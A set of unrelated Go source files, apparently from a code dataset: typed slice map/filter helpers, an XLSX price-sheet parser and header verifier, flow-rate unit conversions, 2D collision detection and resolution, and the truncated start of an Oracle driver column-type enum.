func (slice boolSlice) Map(functors ...boolFunctorForMap) boolSlice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = MapBool(fn, result)
		}
	}
	return result
}

// MakeBoolSlicePtr - creates slice for the functional method such as map, filter
func MakeBoolSlicePtr(values ...*bool) boolSlicePtr {
	return boolSlicePtr(values)
}

// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice boolSlicePtr) MapPtr(functors ...boolFunctorForMapPtr) boolSlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = MapBoolPtr(fn, result)
		}
	}
	return result
}

// Filter - filters list based on function passed as argument
func (slice boolSlice) Filter(functors ...boolFunctorForFilter) boolSlice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = FilterBool(fn, result)
		}
	}
	return result
}

// FilterPtr - filters list based on function passed as argument
func (slice boolSlicePtr) FilterPtr(functors ...boolFunctorForFilterPtr) boolSlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = FilterBoolPtr(fn, result)
		}
	}
	return result
}

// Remove - removes the items from the given list based on supplied function and returns new list
func (slice boolSlice) Remove(functors ...boolFunctorForFilter) boolSlice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = RemoveBool(fn, result)
		}
	}
	return result
}

// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice boolSlicePtr) RemovePtr(functors ...boolFunctorForFilterPtr) boolSlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = RemoveBoolPtr(fn, result)
		}
	}
	return result
}

// DropWhile - drops the items from the list as long as condition satisfies
func (slice boolSlice) DropWhile(functors ...boolFunctorForFilter) boolSlice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = DropWhileBool(fn, result)
		}
	}
	return result
}

// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice boolSlicePtr) DropWhilePtr(functors ...boolFunctorForFilterPtr) boolSlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = DropWhileBoolPtr(fn, result)
		}
	}
	return result
}

// Reverse - reverse the list
func (slice boolSlice) Reverse() boolSlice {
	return ReverseBools(slice)
}

// ReversePtr - reverse the list
func (slice boolSlicePtr) ReversePtr() boolSlicePtr {
	return ReverseBoolsPtr(slice)
}

// Distinct - removes duplicates
func (slice boolSlice) Distinct() boolSlice {
	return DistinctBool(slice)
}

// DistinctPtr - removes duplicates
func (slice boolSlicePtr) DistinctPtr() boolSlicePtr {
	return DistinctBoolPtr(slice)
}

// TakeWhile - returns a new list based on predicate function; it stops once the condition fails.
func (slice boolSlice) TakeWhile(functors ...boolFunctorForFilter) boolSlice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = TakeWhileBool(fn, result)
		}
	}
	return result
}

// TakeWhilePtr - returns a new list based on predicate function; it stops once the condition fails.
func (slice boolSlicePtr) TakeWhilePtr(functors ...boolFunctorForFilterPtr) boolSlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = TakeWhileBoolPtr(fn, result)
		}
	}
	return result
}
type float32Slice []float32
type float32FunctorForMap func(float32) float32
type float32FunctorForFilter func(float32) bool
type float32SlicePtr []*float32
type float32FunctorForMapPtr func(*float32) *float32
type float32FunctorForFilterPtr func(*float32) bool

// MakeFloat32Slice - creates slice for the functional method such as map, filter
func MakeFloat32Slice(values ...float32) float32Slice {
	return float32Slice(values)
}

// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice float32Slice) Map(functors ...float32FunctorForMap) float32Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = MapFloat32(fn, result)
		}
	}
	return result
}

// MakeFloat32SlicePtr - creates slice for the functional method such as map, filter
func MakeFloat32SlicePtr(values ...*float32) float32SlicePtr {
	return float32SlicePtr(values)
}

// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice float32SlicePtr) MapPtr(functors ...float32FunctorForMapPtr) float32SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = MapFloat32Ptr(fn, result)
		}
	}
	return result
}

// Filter - filters list based on function passed as argument
func (slice float32Slice) Filter(functors ...float32FunctorForFilter) float32Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = FilterFloat32(fn, result)
		}
	}
	return result
}

// FilterPtr - filters list based on function passed as argument
func (slice float32SlicePtr) FilterPtr(functors ...float32FunctorForFilterPtr) float32SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = FilterFloat32Ptr(fn, result)
		}
	}
	return result
}

// Remove - removes the items from the given list based on supplied function and returns new list
func (slice float32Slice) Remove(functors ...float32FunctorForFilter) float32Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = RemoveFloat32(fn, result)
		}
	}
	return result
}

// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice float32SlicePtr) RemovePtr(functors ...float32FunctorForFilterPtr) float32SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = RemoveFloat32Ptr(fn, result)
		}
	}
	return result
}

// DropWhile - drops the items from the list as long as condition satisfies
func (slice float32Slice) DropWhile(functors ...float32FunctorForFilter) float32Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = DropWhileFloat32(fn, result)
		}
	}
	return result
}

// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice float32SlicePtr) DropWhilePtr(functors ...float32FunctorForFilterPtr) float32SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = DropWhileFloat32Ptr(fn, result)
		}
	}
	return result
}

// Reverse - reverse the list
func (slice float32Slice) Reverse() float32Slice {
	return ReverseFloat32s(slice)
}

// ReversePtr - reverse the list
func (slice float32SlicePtr) ReversePtr() float32SlicePtr {
	return ReverseFloat32sPtr(slice)
}

// Distinct - removes duplicates
func (slice float32Slice) Distinct() float32Slice {
	return DistinctFloat32(slice)
}

// DistinctPtr - removes duplicates
func (slice float32SlicePtr) DistinctPtr() float32SlicePtr {
	return DistinctFloat32Ptr(slice)
}

// TakeWhile - returns a new list based on predicate function; it stops once the condition fails.
func (slice float32Slice) TakeWhile(functors ...float32FunctorForFilter) float32Slice {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = TakeWhileFloat32(fn, result)
		}
	}
	return result
}

// TakeWhilePtr - returns a new list based on predicate function; it stops once the condition fails.
func (slice float32SlicePtr) TakeWhilePtr(functors ...float32FunctorForFilterPtr) float32SlicePtr {
	result := slice
	for _, fn := range functors {
		if fn != nil {
			result = TakeWhileFloat32Ptr(fn, result)
		}
	}
	return result
}
type float64Slice []float64
type float64FunctorForMap func(float64) float64
type float64FunctorForFilter func(float64) bool
type float64SlicePtr []*float64
type float64FunctorForMapPtr func(*float64) *float64
type float64FunctorForFilterPtr func(*float64) bool
// MakeFloat64Slice - creates slice for the functional method such as map, filter
func MakeFloat64Slice(values ...float64) float64Slice {
newSlice := float64Slice(values)
return newSlice
}
// Map - applies the function(1st argument) on each item of the list and returns new list
func (slice float64Slice) Map(functors ...float64FunctorForMap) float64Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapFloat64(f, tmpSlice)
}
return tmpSlice
}
// MakeFloat64SlicePtr - creates slice for the functional method such as map, filter
func MakeFloat64SlicePtr(values ...*float64) float64SlicePtr {
newSlice := float64SlicePtr(values)
return newSlice
}
// MapPtr - applies the function(1st argument) on each item of the list and returns new list
func (slice float64SlicePtr) MapPtr(functors ...float64FunctorForMapPtr) float64SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = MapFloat64Ptr(f, tmpSlice)
}
return tmpSlice
}
// Filter - filters list based on function passed as argument
func (slice float64Slice) Filter(functors ...float64FunctorForFilter) float64Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterFloat64(f, tmpSlice)
}
return tmpSlice
}
// FilterPtr - filters list based on function passed as argument
func (slice float64SlicePtr) FilterPtr(functors ...float64FunctorForFilterPtr) float64SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = FilterFloat64Ptr(f, tmpSlice)
}
return tmpSlice
}
// Remove - removes the items from the given list based on supplied function and returns new list
func (slice float64Slice) Remove(functors ...float64FunctorForFilter) float64Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveFloat64(f, tmpSlice)
}
return tmpSlice
}
// RemovePtr - removes the items from the given list based on supplied function and returns new list
func (slice float64SlicePtr) RemovePtr(functors ...float64FunctorForFilterPtr) float64SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = RemoveFloat64Ptr(f, tmpSlice)
}
return tmpSlice
}
// DropWhile - drops the items from the list as long as condition satisfies
func (slice float64Slice) DropWhile(functors ...float64FunctorForFilter) float64Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileFloat64(f, tmpSlice)
}
return tmpSlice
}
// DropWhilePtr - drops the items from the list as long as condition satisfies
func (slice float64SlicePtr) DropWhilePtr(functors ...float64FunctorForFilterPtr) float64SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = DropWhileFloat64Ptr(f, tmpSlice)
}
return tmpSlice
}
// Reverse - reverse the list
func (slice float64Slice) Reverse() float64Slice {
return ReverseFloat64s(slice)
}
// ReversePtr - reverse the list
func (slice float64SlicePtr) ReversePtr() float64SlicePtr {
return ReverseFloat64sPtr(slice)
}
// Distinct - removes duplicates
func (slice float64Slice) Distinct() float64Slice {
return DistinctFloat64(slice)
}
// DistinctPtr - removes duplicates
func (slice float64SlicePtr) DistinctPtr() float64SlicePtr {
return DistinctFloat64Ptr(slice)
}
//TakeWhile - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice float64Slice) TakeWhile(functors ...float64FunctorForFilter) float64Slice {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileFloat64(f, tmpSlice)
}
return tmpSlice
}
//TakeWhilePtr - Returns a new list based on predicate function. It returns new list once condition fails.
func (slice float64SlicePtr) TakeWhilePtr(functors ...float64FunctorForFilterPtr) float64SlicePtr {
tmpSlice := slice
for _, f := range functors {
if f == nil {
continue
}
tmpSlice = TakeWhileFloat64Ptr(f, tmpSlice)
}
return tmpSlice
} | fp/methodchain.go | 0.649023 | 0.488283 | methodchain.go | starcoder |
package pricing
import (
"fmt"
"github.com/transcom/mymove/pkg/models"
)
// parseNonStandardLocnPrices: parser for 3e) Non-Standard Loc'n Prices
var parseNonStandardLocnPrices processXlsxSheet = func(params ParamConfig, sheetIndex int, logger Logger) (interface{}, error) {
// XLSX Sheet consts
const xlsxDataSheetNum int = 14 // 3e) Non-Standard Loc'n Prices
const feeColIndexStart int = 7 // start at column 7 to get the rates
const feeRowIndexStart int = 10 // start at row 10 to get the rates (NSRA to NSRA)
const feeRowNToOIndexStart int = 243 // start at row 243 to get the NSRA to OCONUS rates
const feeRowOToNIndexStart int = 1031 // start at row 1031 to get the OCONUS to NSRA rates
const feeRowNToCIndexStart int = 1819 // start at row 1819 to get the NSRA to CONUS rates
const feeRowOCToNIndexStart int = 2622 // start at row 2622 to get the CONUS to NSRA rates
const originIDColumn int = 2
const originAreaColumn int = 3
const destinationIDColumn int = 4
const destinationAreaColumn int = 5
const moveType int = 6
if xlsxDataSheetNum != sheetIndex {
return nil, fmt.Errorf("parseNonStandardLocnPrices expected to process sheet %d, but received sheetIndex %d", xlsxDataSheetNum, sheetIndex)
}
prefixPrinter := newDebugPrefix("StageNonStandardLocnPrice")
var nonStandardLocationPrices []models.StageNonStandardLocnPrice
sheet := params.XlsxFile.Sheets[xlsxDataSheetNum]
moveTypeSections := []int{
feeRowIndexStart,
feeRowNToOIndexStart,
feeRowOToNIndexStart,
feeRowNToCIndexStart,
feeRowOCToNIndexStart,
}
for _, section := range moveTypeSections {
for rowIndex := section; rowIndex < sheet.MaxRow; rowIndex++ {
colIndex := feeColIndexStart
// All the rows are consecutive, if we get to a blank one we're done
if mustGetCell(sheet, rowIndex, colIndex) == "" {
break
}
// For each Rate Season
for _, r := range rateSeasons {
nonStandardLocationPrice := models.StageNonStandardLocnPrice{
OriginID: mustGetCell(sheet, rowIndex, originIDColumn),
OriginArea: mustGetCell(sheet, rowIndex, originAreaColumn),
DestinationID: mustGetCell(sheet, rowIndex, destinationIDColumn),
DestinationArea: mustGetCell(sheet, rowIndex, destinationAreaColumn),
MoveType: mustGetCell(sheet, rowIndex, moveType),
Season: r,
}
nonStandardLocationPrice.HHGPrice = mustGetCell(sheet, rowIndex, colIndex)
colIndex++
nonStandardLocationPrice.UBPrice = mustGetCell(sheet, rowIndex, colIndex)
prefixPrinter.Printf("%+v\n", nonStandardLocationPrice)
nonStandardLocationPrices = append(nonStandardLocationPrices, nonStandardLocationPrice)
colIndex += 2 // skip 1 column (empty column) before starting next Rate type
}
}
}
return nonStandardLocationPrices, nil
}
// verifyNonStandardLocnPrices checks that sheet 14's header cells match
// the fixed layout parseNonStandardLocnPrices relies on, returning a
// descriptive error on the first mismatch.
var verifyNonStandardLocnPrices verifyXlsxSheet = func(params ParamConfig, sheetIndex int) error {
	const xlsxDataSheetNum = 14
	const feeRowIndexStart int = 10 // this should match the same const in parse fn
	const headerRowIndex int = feeRowIndexStart - 2
	const originIDCol int = 2
	const originAreaCol int = 3
	const destinationIDCol int = 4
	const destinationAreaCol int = 5
	const moveTypeCol int = 6
	const feeColIndexStart int = 7
	// Guard against being wired to the wrong sheet.
	if xlsxDataSheetNum != sheetIndex {
		return fmt.Errorf("verifyNonStandardLocnPrices expected to process sheet %d, but received sheetIndex %d", xlsxDataSheetNum, sheetIndex)
	}
	// Price headers repeated once per rate season (whitespace is
	// stripped before comparison).
	repeatingHeaders := []string{
		"HHGPrice(exceptSIT)(percwt)",
		"UBPrice(exceptSIT)(percwt)",
	}
	sheet := params.XlsxFile.Sheets[xlsxDataSheetNum]
	mergedHeaderRowIndex := headerRowIndex - 1 // merged cell uses lower bound
	if err := verifyHeader(sheet, mergedHeaderRowIndex, originIDCol, "OriginID"); err != nil {
		return fmt.Errorf("verifyNonStandardLocnPrices verification failure: %w", err)
	}
	if err := verifyHeader(sheet, mergedHeaderRowIndex, originAreaCol, "OriginArea"); err != nil {
		return fmt.Errorf("verifyNonStandardLocnPrices verification failure: %w", err)
	}
	if err := verifyHeader(sheet, mergedHeaderRowIndex, destinationIDCol, "DestinationID"); err != nil {
		return fmt.Errorf("verifyNonStandardLocnPrices verification failure: %w", err)
	}
	if err := verifyHeader(sheet, mergedHeaderRowIndex, destinationAreaCol, "DestinationArea"); err != nil {
		return fmt.Errorf("verifyNonStandardLocnPrices verification failure: %w", err)
	}
	// note: Move Type row is not merged like the other non-price headers
	if err := verifyHeader(sheet, headerRowIndex, moveTypeCol, "MoveType"); err != nil {
		return fmt.Errorf("verifyNonStandardLocnPrices verification failure: %w", err)
	}
	// Walk the repeated per-season price headers; column layout is two
	// price columns plus one blank separator column per season.
	colIndex := feeColIndexStart
	for _, season := range rateSeasons {
		for _, header := range repeatingHeaders {
			// don't use verifyHeader fn here so that we can name the season
			if header != removeWhiteSpace(mustGetCell(sheet, headerRowIndex, colIndex)) {
				return fmt.Errorf("format error: Header for '%s' season '%s' is missing, got '%s' instead", season, header, removeWhiteSpace(mustGetCell(sheet, headerRowIndex, colIndex)))
			}
			colIndex++
		}
		colIndex++
	}
	return nil
}
package unit
// Flow represents a SI unit of volume flow rate in cubic meters per second, m3/s.
type Flow Unit

// Conversion factors: each constant is the amount of the named unit
// expressed in cubic meters per second, so multiplying a raw value by
// its constant normalizes it to the SI base.
const (
	// SI
	CubicMeterPerSecond Flow = 1e0
	LiterPerSecond           = CubicMeterPerSecond * 1e-3
	LiterPerMinute           = LiterPerSecond * 1 / 60
	LiterPerHour             = LiterPerSecond * 1 / 3600
	// Non-SI
	CubicFootPerSecond = CubicMeterPerSecond * 0.028316846592
	// US liquid
	USLiquidGallonPerSecond = LiterPerSecond * 3.7854117839988
	USLiquidGallonPerMinute = USLiquidGallonPerSecond * 1 / 60
	USLiquidGallonPerHour   = USLiquidGallonPerSecond * 1 / 3600
)
// FromCubicMetersPerSecond returns a flow Value holding val expressed in m3/s.
func FromCubicMetersPerSecond(val float64) Value {
	return Value{val * float64(CubicMeterPerSecond), flow}
}

// toCubicMetersPerSecond converts value to m3/s; ErrConversion if value is not a flow.
func toCubicMetersPerSecond(value Value) (float64, error) {
	if value.unit != flow {
		return 0, ErrConversion
	}
	return Flow(value.val).CubicMetersPerSecond(), nil
}

// CubicMetersPerSecond returns the flow rate in m3/s.
func (f Flow) CubicMetersPerSecond() float64 {
	return float64(f)
}

// FromCubicFeetPerSecond returns a flow Value holding val expressed in ft3/s.
func FromCubicFeetPerSecond(val float64) Value {
	return Value{val * float64(CubicFootPerSecond), flow}
}

// toCubicFeetPerSecond converts value to ft3/s; ErrConversion if value is not a flow.
func toCubicFeetPerSecond(value Value) (float64, error) {
	if value.unit != flow {
		return 0, ErrConversion
	}
	return Flow(value.val).CubicFeetPerSecond(), nil
}

// CubicFeetPerSecond returns the flow rate in ft3/s.
func (f Flow) CubicFeetPerSecond() float64 {
	return float64(f / CubicFootPerSecond)
}

// FromLitersPerSecond returns a flow Value holding val expressed in l/s.
func FromLitersPerSecond(val float64) Value {
	return Value{val * float64(LiterPerSecond), flow}
}

// toLitersPerSecond converts value to l/s; ErrConversion if value is not a flow.
func toLitersPerSecond(value Value) (float64, error) {
	if value.unit != flow {
		return 0, ErrConversion
	}
	return Flow(value.val).LitersPerSecond(), nil
}

// LitersPerSecond returns the flow rate in l/s.
func (f Flow) LitersPerSecond() float64 {
	return float64(f / LiterPerSecond)
}

// FromLitersPerHour returns a flow Value holding val expressed in l/h.
func FromLitersPerHour(val float64) Value {
	return Value{val * float64(LiterPerHour), flow}
}

// toLitersPerHour converts value to l/h; ErrConversion if value is not a flow.
func toLitersPerHour(value Value) (float64, error) {
	if value.unit != flow {
		return 0, ErrConversion
	}
	return Flow(value.val).LitersPerHour(), nil
}

// LitersPerHour returns the flow rate in l/h.
func (f Flow) LitersPerHour() float64 {
	return float64(f / LiterPerHour)
}

// FromLitersPerMinute returns a flow Value holding val expressed in l/min.
func FromLitersPerMinute(val float64) Value {
	return Value{val * float64(LiterPerMinute), flow}
}

// toLitersPerMinute converts value to l/min; ErrConversion if value is not a flow.
func toLitersPerMinute(value Value) (float64, error) {
	if value.unit != flow {
		return 0, ErrConversion
	}
	return Flow(value.val).LitersPerMinute(), nil
}

// LitersPerMinute returns the flow rate in l/min.
func (f Flow) LitersPerMinute() float64 {
	return float64(f / LiterPerMinute)
}

// FromUSLiquidGallonsPerHour returns a flow Value holding val expressed in gal/h.
func FromUSLiquidGallonsPerHour(val float64) Value {
	return Value{val * float64(USLiquidGallonPerHour), flow}
}

// toUSLiquidGallonsPerHour converts value to gal/h; ErrConversion if value is not a flow.
func toUSLiquidGallonsPerHour(value Value) (float64, error) {
	if value.unit != flow {
		return 0, ErrConversion
	}
	return Flow(value.val).USLiquidGallonsPerHour(), nil
}

// USLiquidGallonsPerHour returns the flow rate in gal/h.
func (f Flow) USLiquidGallonsPerHour() float64 {
	return float64(f / USLiquidGallonPerHour)
}

// FromUSLiquidGallonsPerMinute returns a flow Value holding val expressed in gal/min.
func FromUSLiquidGallonsPerMinute(val float64) Value {
	return Value{val * float64(USLiquidGallonPerMinute), flow}
}

// toUSLiquidGallonsPerMinute converts value to gal/min; ErrConversion if value is not a flow.
func toUSLiquidGallonsPerMinute(value Value) (float64, error) {
	if value.unit != flow {
		return 0, ErrConversion
	}
	return Flow(value.val).USLiquidGallonsPerMinute(), nil
}

// USLiquidGallonsPerMinute returns the flow rate in gal/min.
func (f Flow) USLiquidGallonsPerMinute() float64 {
	return float64(f / USLiquidGallonPerMinute)
}

// FromUSLiquidGallonsPerSecond returns a flow Value holding val expressed in gal/s.
func FromUSLiquidGallonsPerSecond(val float64) Value {
	return Value{val * float64(USLiquidGallonPerSecond), flow}
}

// toUSLiquidGallonsPerSecond converts value to gal/s; ErrConversion if value is not a flow.
func toUSLiquidGallonsPerSecond(value Value) (float64, error) {
	if value.unit != flow {
		return 0, ErrConversion
	}
	return Flow(value.val).USLiquidGallonsPerSecond(), nil
}

// USLiquidGallonsPerSecond returns the flow rate in gal/s.
func (f Flow) USLiquidGallonsPerSecond() float64 {
	return float64(f / USLiquidGallonPerSecond)
}
package physics
import (
"fmt"
)
const (
	// velocityTolerance is presumably the threshold under which a
	// velocity component is treated as zero — it is not referenced in
	// this chunk of the file; TODO confirm its use site.
	velocityTolerance float64 = 0.001
)
// CollisionInfo describes a collision between two shapes, or its absence.
type CollisionInfo struct {
	first       Shape   // first shape involved
	second      Shape   // second shape; nil when there is no collision
	penetration float64 // penetration depth along the collision normal
	normal      Vec2    // collision normal, oriented from first towards second
	resolved    bool    // set once the collision has been resolved
}

// IsColliding reports whether a collision occurred (second is only set
// by the detection functions when the shapes overlap).
func (i *CollisionInfo) IsColliding() bool {
	return i.second != nil
}

// Resolved reports whether the collision has already been resolved.
func (i *CollisionInfo) Resolved() bool {
	return i.resolved
}

// SetResolved marks the collision as resolved (or not).
func (i *CollisionInfo) SetResolved(b bool) {
	i.resolved = b
}

// First returns the first of the two shapes involved in the collision.
func (i *CollisionInfo) First() Shape {
	return i.first
}

// Second returns the second of the two shapes involved in the collision.
func (i *CollisionInfo) Second() Shape {
	return i.second
}
// GetShapeForTag returns the shapes involved in the collision that
// carry the given tag, plus an error when neither of them has it.
func (i *CollisionInfo) GetShapeForTag(t string) ([]Shape, error) {
	shapes := []Shape{}
	for _, s := range []Shape{i.first, i.second} {
		if stringListContains(s.Tags(), t) {
			shapes = append(shapes, s)
		}
	}
	if len(shapes) == 0 {
		return shapes, fmt.Errorf("Pas de forme ayant le tag %v", t)
	}
	return shapes, nil
}
// GetShapeForName returns the shape with the given name, or nil and an
// error when neither shape matches.
func (i *CollisionInfo) GetShapeForName(n string) (Shape, error) {
	switch n {
	case i.first.Name():
		return i.first, nil
	case i.second.Name():
		return i.second, nil
	}
	return nil, fmt.Errorf("Aucune des formes n'a ce nom: %v", n)
}
// String returns a printable representation of the collision.
// NOTE(review): both shapes' Name() are dereferenced, so calling this
// on a non-collision (second == nil) would panic — confirm callers only
// use it after IsColliding().
func (i *CollisionInfo) String() string {
	return fmt.Sprintf("first: %v second: %v penetration: %v normal: %v",
		i.first.Name(), i.second.Name(), i.penetration, i.normal)
}
// Resolv resolves the collision by applying a positional correction and
// an impulse to both objects along the collision normal.
func (i *CollisionInfo) Resolv() {
	// Never resolve the same collision twice.
	if i.resolved {
		return
	}
	// No need to "separate" the objects, since the collision is resolved
	// by applying an impulse.
	// i.Separate()
	first := i.first
	second := i.second
	// Determine the impulse to apply to the objects along the collision normal.
	// Relative velocity.
	f2S := second.Velocity().Sub(first.Velocity())
	// Relative velocity projected onto the collision normal.
	vRelAlongNorm := f2S.DotProduct(i.normal)
	// Do not resolve if the objects are already moving apart.
	if vRelAlongNorm > 0 {
		return
	}
	// Restitution: use the smaller elasticity of the two bodies.
	e := Min(first.Elasticity(), second.Elasticity())
	// Compute the scalar impulse, distributed by inverse mass.
	j := -(1 + e) * vRelAlongNorm
	j /= first.InvMass() + second.InvMass()
	impulse := i.normal.Mult(j)
	// Apply the impulse (opposite directions for the two bodies).
	first.SetVelocity(first.Velocity().Sub(impulse.Mult(first.InvMass())))
	second.SetVelocity(second.Velocity().Add(impulse.Mult(second.InvMass())))
	// Apply friction as simple velocity damping.
	first.SetVelocity(first.Velocity().Mult(1 - first.Friction()))
	second.SetVelocity(second.Velocity().Mult(1 - second.Friction()))
	// Positional correction against "sinking", caused by "the resulting
	// velocity being insufficient to push an object out of a collision
	// when an object is stationary".
	percent := 0.5 // usually 20% to 80%
	corr := i.normal.Mult(i.penetration / (first.InvMass() + second.InvMass()) * percent)
	first.SetPos(first.Pos().Sub(corr.Mult(first.InvMass())))
	second.SetPos(second.Pos().Add(corr.Mult(second.InvMass())))
	// Mark as resolved so the same collision can never be resolved twice.
	i.SetResolved(true)
}
// Separate separates two objects by moving them back to a pre-collision
// position, splitting the displacement by inverse mass.
func (i *CollisionInfo) Separate() {
	// Never resolve the same collision twice.
	if i.resolved {
		return
	}
	first := i.first
	second := i.second
	// Reposition interpenetrating objects along the collision normal,
	// each displaced in proportion to its inverse mass.
	totInvMass := first.InvMass() + second.InvMass()
	first.SetPos(first.Pos().Sub(i.normal.Mult(i.penetration * first.InvMass() / totInvMass)))
	second.SetPos(second.Pos().Add(i.normal.Mult(i.penetration * second.InvMass() / totInvMass)))
	// Mark as resolved so the same collision can never be resolved twice.
	i.SetResolved(true)
}
// AABBvsAABB detects a collision between two axis-aligned rectangles.
// It returns a CollisionInfo holding the penetration depth and the
// normal of the face on which the collision occurs (second is left nil
// when there is no overlap).
func AABBvsAABB(first *Rectangle, second *Rectangle) *CollisionInfo {
	info := &CollisionInfo{}
	info.first = first
	// Separating-axis test on X then Y: any gap means no collision.
	if first.getMax().X < second.Pos().X || first.Pos().X > second.getMax().X {
		return info
	}
	if first.getMax().Y < second.Pos().Y || first.Pos().Y > second.getMax().Y {
		return info
	}
	// There is a collision.
	info.second = second
	// Difference between the center-to-center distance and the sum of
	// the half-extents, on both axes, gives the penetration depth of one
	// shape into the other.
	distance := second.Center().Sub(first.Center())
	px := (first.Width()+second.Width())/2 - Abs(distance.X)
	py := (first.Height()+second.Height())/2 - Abs(distance.Y)
	// Pick the axis of least penetration as the collision normal.
	if px < py {
		sx := Sign(distance.X)
		info.normal.X = sx
		info.penetration = px
	} else {
		sy := Sign(distance.Y)
		info.normal.Y = sy
		info.penetration = py
	}
	// Grounded when the normal points up (Y == -1) and the body has mass.
	if info.normal.Y == -1 {
		if first.mass != 0 {
			first.SetGrounded(true)
		}
		if second.mass != 0 {
			second.SetGrounded(true)
		}
	}
	return info
}
// CirclevsCircle generates a CollisionInfo for circle/circle collisions
// (second is left nil when the circles do not overlap).
func CirclevsCircle(first *Circle, second *Circle) *CollisionInfo {
	info := &CollisionInfo{}
	info.first = first
	firstCenter, secCenter := first.Center(), second.Center()
	// Vector from the first center to the second.
	FirstSec := secCenter.Sub(firstCenter)
	dist := FirstSec.Length()
	radSum := first.radius + second.radius
	// The distance between the two centers is larger than the sum of the
	// radii: no collision.
	if dist >= radSum {
		return info
	}
	// There is a collision.
	info.second = second
	if dist != 0 {
		info.penetration = radSum - dist
		info.normal = FirstSec.Div(dist) // dist already computed
	} else { // the two circles share the same center: pick an arbitrary normal
		info.penetration = first.radius
		info.normal = Vec2{1, 0}
	}
	// TODO: what is this for?
	// Grounded when the normal points up (Y == -1) and the body has mass.
	if info.normal.Y == -1 {
		if first.mass != 0 {
			first.SetGrounded(true)
		}
		if second.mass != 0 {
			second.SetGrounded(true)
		}
	}
	return info
}
//AABBvsCircle génère CollisionInfo pour collisions rectangle/cercle
// Copié de https://gamedevelopment.tutsplus.com/tutorials/how-to-create-a-custom-2d-physics-engine-the-basics-and-impulse-resolution--gamedev-6331
func AABBvsCircle(first *Rectangle, second *Circle) *CollisionInfo {
info := &CollisionInfo{}
info.first = first
n := second.Center().Sub(first.Center())
closest := n
xExtent := first.Width() / 2
yExtent := first.Height() / 2
closest.X = Clamp(closest.X, -xExtent, xExtent)
closest.Y = Clamp(closest.Y, -yExtent, yExtent)
closest = first.Center().Add(closest)
inside := false
// Cercle est dans AABB
if n == closest {
inside = true
// Axe le plus proche
if Abs(n.X) > Abs(n.X) {
if closest.X > 0 {
closest.X = xExtent
} else {
closest.X = -xExtent
}
} else {
if closest.Y > 0 {
closest.Y = yExtent
} else {
closest.Y = -yExtent
}
}
}
dist := second.Center().Distance(closest)
if dist > second.Radius() && !inside {
return info
}
info.second = second
normale := second.Center().Sub(closest).Normalize()
if inside {
info.normal = normale.Neg()
} else {
info.normal = normale
}
info.penetration = second.Radius() - dist
// grounded si normale.Y == -1 et corps a une masse
if info.normal.Y == -1 {
if first.mass != 0 {
first.SetGrounded(true)
}
if second.mass != 0 {
second.SetGrounded(true)
}
}
return info
} | collision.go | 0.581778 | 0.596551 | collision.go | starcoder |
package ora
// GoColumnType defines the Go type returned from a sql select column.
type GoColumnType uint

// go column types
// Values start at iota + 1 so the zero value of GoColumnType is
// distinguishable as "unset".
const (
	// D defines a sql select column based on its default mapping.
	D GoColumnType = iota + 1
	// I64 defines a sql select column as a Go int64.
	I64
	// I32 defines a sql select column as a Go int32.
	I32
	// I16 defines a sql select column as a Go int16.
	I16
	// I8 defines a sql select column as a Go int8.
	I8
	// U64 defines a sql select column as a Go uint64.
	U64
	// U32 defines a sql select column as a Go uint32.
	U32
	// U16 defines a sql select column as a Go uint16.
	U16
	// U8 defines a sql select column as a Go uint8.
	U8
	// F64 defines a sql select column as a Go float64.
	F64
	// F32 defines a sql select column as a Go float32.
	F32
	// OraI64 defines a sql select column as a nullable Go ora.Int64.
	OraI64
	// OraI32 defines a sql select column as a nullable Go ora.Int32.
	OraI32
	// OraI16 defines a sql select column as a nullable Go ora.Int16.
	OraI16
	// OraI8 defines a sql select column as a nullable Go ora.Int8.
	OraI8
	// OraU64 defines a sql select column as a nullable Go ora.Uint64.
	OraU64
	// OraU32 defines a sql select column as a nullable Go ora.Uint32.
	OraU32
	// OraU16 defines a sql select column as a nullable Go ora.Uint16.
	OraU16
	// OraU8 defines a sql select column as a nullable Go ora.Uint8.
	OraU8
	// OraF64 defines a sql select column as a nullable Go ora.Float64.
	OraF64
	// OraF32 defines a sql select column as a nullable Go ora.Float32.
	OraF32
	// T defines a sql select column as a Go time.Time.
	T
